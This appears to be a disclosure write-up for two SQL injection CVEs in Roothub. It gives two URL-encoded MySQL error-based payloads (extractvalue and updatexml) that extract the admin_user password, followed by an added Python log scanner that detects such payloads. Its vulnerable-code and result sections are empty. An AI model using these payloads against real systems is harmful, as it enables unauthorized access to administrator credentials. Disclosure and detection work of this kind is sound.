Roothub_vulns
Vulnerable code:
Bug 1 / CVE-2022-27473:
Bug 2 / CVE-2022-27472:
Payload: we can use the MySQL "extractvalue" or "updatexml" function to trigger an exception and complete the exploitation of this SQLi vulnerability.
-
"extractvalue": a%25'%20union%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cextractvalue('1'%2Cconcat('~'%2C(select%20password%20from%20admin_user)))%20from%20admin_user--%20
-
"updatexml": xx%25%27%20and%20updatexml(1%2Cconcat(0x7e%2C(select%20password%20from%20admin_user)%2C0x7e)%2C3)--%20
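
A defender's view of the two payload shapes above, as an added example that is not part of the original write-up: a request-log scanner that URL-decodes each query parameter (repeating the decode to catch double encoding) and flags a call to `extractvalue(` or `updatexml(` that carries `concat` or a subquery. The `/search` and `/docs` paths, the parameter names and the log lines are constructed for illustration and are not Roothub's real endpoints.

```python
import re
from urllib.parse import unquote_plus

# MySQL XML functions used for error-based extraction, followed by "(".
XML_FUNC = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
# concat() or a subquery after the call is what puts data into the error text.
DATA_ARG = re.compile(r"\b(concat|select)\b", re.I)

# Constructed sample request lines (not taken from a real server).
SAMPLE_LOG = [
    "GET /search?s=spring%20boot&p=2",
    "GET /search?s=x%25%27%20and%20updatexml(1%2Cconcat(0x7e%2C(select%201)%2C0x7e)%2C3)--%20",
    "GET /search?s=a%2527%2520or%2520ExtractValue(1%252Cconcat(0x7e%252Cversion()))",
    "GET /docs?q=how+does+updatexml+work",
]


def normalize(value, max_rounds=3):
    """URL-decode until stable (bounded), collapse whitespace, lowercase."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).lower()


def flag_parameter(raw_value):
    """Return the matched function name if the value looks like error-based SQLi, else None."""
    text = normalize(raw_value)
    match = XML_FUNC.search(text)
    if match and DATA_ARG.search(text, match.end()):
        return match.group(1)
    return None


def scan(log_lines):
    """Return (line_no, parameter, function) for every suspicious query parameter."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        _, _, query = line.partition("?")
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            func = flag_parameter(raw)
            if func:
                hits.append((line_no, name, func))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d: parameter %r calls %s()" % hit)
```

Matching on the function call rather than the bare word keeps a benign search such as the last sample line from alerting. A hit is a lead for triage; the fix for the bug itself is binding the search term as a query parameter.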
Result:



